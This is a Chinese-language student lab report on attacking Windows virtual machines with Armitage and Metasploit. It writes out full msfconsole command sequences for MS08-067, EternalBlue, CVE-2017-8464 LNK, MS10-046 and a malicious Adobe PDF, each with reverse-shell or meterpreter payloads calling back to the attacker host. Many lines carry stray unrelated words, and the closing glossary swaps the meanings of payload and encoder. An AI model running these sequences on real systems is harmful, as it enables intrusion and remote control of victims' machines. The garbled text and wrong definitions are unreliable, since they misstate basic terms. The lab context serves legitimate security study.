在kali端輸入 armitage 啓動armitagelinux
發現開啓失敗,更根據提示先輸入 /etc/init.d/postgresql start ,打開postgresql服務再進入armitagesql
更改端口爲學號4309,其餘選項默認不變shell
進入界面發現沒有能夠攻擊的主機windows
選擇上方菜單欄hosts-nmap scan-quick scan(os detect)進行掃描api
對虛擬機所在的網段進行掃描瀏覽器
選中靶機,右鍵選擇services,查看能夠利用的端口 session
右鍵選擇scan進行掃描 tcp
選擇上方菜單欄attacks-findattacks工具
能夠進行攻擊了!post
對win7端攻擊失敗後,我增添了一臺xp sp3繼續進行實驗;
選中目標主機右鍵attack-smb-ms08_067_netapi
在攻擊win7失敗後,我下載了一個xp進行實驗,攻擊仍然失敗,猜想應該是與xp系統的中英文版本有關,中文盜版猖獗,每次有新補丁盜版方還會貼心地給用戶打上。。。
從新下載一個windows2003 server sp2,進行相關攻擊
2003端仍然失敗,從新在windows 2000 sp4上實驗仍是失敗,也許不是系統版本與相關補丁的問題,多是kali上的armitage配置出現了一些問題,暫時排除不了具體緣由,仍是用老辦法msfconsole繼續實驗吧。
攻擊端:kali 2019 192.168.236.131
靶機:win 2000 sp4 192.168.236.143
輸入 msfconsole
輸入 search ms08_067 ,查找可用的exploit
輸入 use exploit/windows/smb/ms08_067_netapi
輸入 show payloads 對可以使用的payload進行查找,這裏我使用generic/shell_reverse_tcp
輸入 set payload generic/shell_reverse_tcp
配置攻擊源地址源端口與目的地址
set RHOST 192.168.236.143 set LPORT 4309 set LHOST 192.168.236.131
輸入 show options 查看具體信息
輸入 exploit 進行滲透攻擊
攻擊成功
攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶機:Win 7 旗艦版 ip:192.168.236.128
仍是沒有死心,打算再次使用armitage實驗。
選中靶機,在armitage左側目錄中選擇exploit-windows-smb-ms_010_eternalblue
看似是攻擊成功了,可是在鏈接sessions與調用meterpreter shell是出現了問題,看來應該是我kali中armitage工具不夠完善。仍是乖乖滾回去用msf吧。
進入msfconsole
輸入 search ms17 type: auxiliary platform:windows 查找永恆之藍的auxiliary輔助模塊掃描指令
輸入 use auxiliary/scanner/smb/smb_ms17_010
輸入 set RHOSTS 192.168.239.129 設置目標地址
輸入 run 進行掃描
可以創建鏈接,開始正式攻擊
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/shell/reverse_tcp set RHOST 192.168.236.128 set LPORT 4309 set LHOST 192.168.236.131 show options exploit
攻擊成功。
use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 exploit
輸入 cp -r /root/.msf4/local/ /root/1 將生成的文件從隱藏文件夾中複製出來
將文件導出至U盤,鏈接到靶機中。
kali端進行監聽:
search multi/handler use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 run
在靶機運行U盤中的FlashPlayerCPLAPP.cpl
攻擊成功。
攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶機:Win xp ps3 ip:192.168.236.134
進入msfconsole
輸入 search ms10_046
輸入 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_http set RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131 show options exploit
靶機鏈接http://192.168.236.131:80/
輸入 session -i 1 鏈接id爲1的session獲取shell
攻擊成功。
攻擊端:kali-linux-2019.1-amd64 ip:192.168.236.131
靶機:Win xp ps3 ip:192.168.236.134
進入msfconsole
輸入 search adobe type:exploit platform:windows 查找可用漏洞,這裏我選擇了adobe_pdf_embedded_exe
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show payloads
Set payload windows/meterpreter/reverse_tcp set RHOST 192.168.236.134 set RHOST 192.168.236.134 set LPORT 4309 set LHOST 192.168.236.131 set FILENAME 20164309.pdf show options exploit
生成文件20164309.pdf
使用nc將文件傳輸到靶機中
ncat.exe -lv 4309 > 20164309.pdf nc 192.168.236.134 4309 < 20164309.pdf
攻擊機中進行監聽
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.236.131 set LPORT 4309 exploit
靶機中打開文件,攻擊成功。
Exploit:「利用」,經過漏洞來攻擊受害者,也就是拉貨的馬;
Payload:「編碼」,去掉「壞字符」,爲滲透攻擊作準備;改變特徵碼,起到免殺做用;也就是貨車;
Encode:「有效負載」、「shellcode」,可以在受害者環境中進行操做,也就是裝貨的車箱。
整個攻擊過程就是馬拉着裝滿貨物的車送往目的地。
本次實驗是我歷時最長的一次實驗,也是收穫最大的一次實驗。包括實驗報告的撰寫實驗五一共花費了我四個晚上的時間,讓我深深明白了什麼是自學。在實驗的開始我打算圖方便使用armitage進行自動化攻擊,致使我在不停下載與更換虛擬機上浪費了過多的時間,最後仍是沒有排除沒法成功應用armitage。其實我還嘗試了WebExec(CVE-2018-15442)與mssql_payload但均以失敗了結,這也讓我感覺到了我能力的不足。
缺的東西大了去了,以個人水平只是到應用msf工具的水平,還不能詳細的闡述攻擊的原理;而且meterpreter庫中更新不及時,不少漏洞都及時被windows官方發現與修復,實戰性不強;同時像payload的編寫、encode的設計咱們都沒有能力實現,致使攻擊方法單一,水準不夠高。